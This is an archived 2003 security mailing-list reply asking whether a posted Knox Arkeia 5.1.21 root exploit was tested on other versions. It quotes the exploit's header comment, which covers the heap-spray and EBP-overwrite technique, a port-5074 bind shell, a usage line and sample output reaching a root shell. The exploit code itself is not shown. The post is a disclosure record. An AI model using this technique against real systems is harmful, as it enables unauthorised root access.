lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200309191429.16613.dlhane@sbcglobal.net>
From: dlhane at sbcglobal.net (David Hane)
Subject: Knox Arkeia 5.1.21 local/remote root exploit

Have you tested this on other versions?

DH

On Friday 19 September 2003 10:36, A. C. wrote:
> Exploit attached for Knox Arkeia Pro v5.1.21 backup
> software from http://www.arkeia.com.
>
>
>
>
> /*
>  * Knox Arkiea arkiead local/remote root exploit.
>  *
>  * Portbind 5074 shellcode
>  *
>  * Tested on Redhat 8.0, Redhat 7.2, but all versions
> are presumed vulnerable.
>  *
>  * NULLs out least significant byte of EBP to pull EIP
> out of overflow buffer.
>  * A previous request forces a large allocation of
> NOP's + shellcode in heap
>  * memory.  Find additional targets by searching the
> heap for NOP's after a
>  * crash.  safeaddr must point to any area of memory
> that is read/writable
>  * and won't mess with program/shellcode flow.
>  *
>  * ./ark_sink host targetnum
>  * [user@...t dir]$ ./ark_sink 192.168.1.2 1
>  * [*] Connected to 192.168.1.2:617
>  * [*] Connected to 192.168.1.2:617
>  * [*] Sending nops+shellcode
>  * [*] Done, sleeping
>  * [*] Sending overflow
>  * [*] Done
>  * [*] Sleeping and connecting remote shell
>  * [*] Connected to 192.168.1.2:5074
>  * [*] Success, enjoy
>  * id
>  * uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>  *
>  *
>  */
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free, easy-to-use web site design software
> http://sitebuilder.yahoo.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ